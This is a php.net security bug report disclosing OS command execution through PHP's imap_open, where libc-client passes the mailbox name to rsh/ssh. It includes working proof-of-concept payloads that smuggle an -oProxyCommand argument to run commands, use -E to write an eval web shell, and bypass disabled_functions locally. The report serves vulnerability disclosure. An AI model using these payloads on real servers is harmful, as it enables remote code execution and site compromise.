php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #76428 Command execution through imap_open
Submitted: 2018-06-08 01:03 UTC Modified: 2018-11-20 19:37 UTC
From: c dot r dot l dot f at yandex dot ru Assigned:
Status: Duplicate Package: IMAP related
PHP Version: 7.0.30 OS: Debian Linux
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: c dot r dot l dot f at yandex dot ru
New email:
PHP Version: OS:

 

 [2018-06-08 01:03 UTC] c dot r dot l dot f at yandex dot ru
Description:
------------
Hello.

Some PHP CMS/CRM's uses IMAP package in it's features. I was encountered with such functionality in my research and found ability to execute OS commands through imap_open function. Which can be exploitable remotely or locally to bypass disabled_functions and open_basedir.

The test was conducted on fresh "Debian 9" with "PHP 7.0.27", but most likely it's not important, because I think there are some problems in "libc-client" and this may affects other distros.

For some reasons "libc-client" uses "/usr/bin/rsh" for check(?) connection to a given hostname and adds additional arguments, if a space char is presents in the giving mailbox. Then all argument goes to "execve" call.

In debian based distros "rsh" is a link to "ssh", so "-oProxyCommand" option can be used for command execution and "-E" for file write.

Test script:
---------------
Remote:
<?php
//File write:
//<?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php}
//
//RCE:
//server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1

imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);
?>

Local:

<?php
file_put_contents('x','touch /tmp/PWN');
chmod('x', 0755);
imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0);
unlink('x');
?>

Expected result:
----------------
Connection error

Actual result:
--------------
Unexpected OS command execution

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2018-06-20 04:31 UTC] stas@php.net
If libc-client indeed uses shell on mailbox name without filtering, that bug should be reported to libc-client maintainers. I am not sure what PHP could do here if the offending code is inside libc-client.
 [2018-06-20 04:31 UTC] stas@php.net
-Status: Open +Status: Suspended
 [2018-06-20 15:23 UTC] c dot r dot l dot f at yandex dot ru
Since package uses third party code, I think that you must indicate that unfiltered user data can lead to unpredictable consequences and you have nothing to do with it :)
 [2018-11-20 19:36 UTC] stas@php.net
-Status: Suspended +Status: Duplicate
 [2018-11-20 19:36 UTC] stas@php.net
See bug #76428
 [2018-11-20 19:37 UTC] stas@php.net
Oops I meant bug #77153
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Dec 12 18:01:26 2024 UTC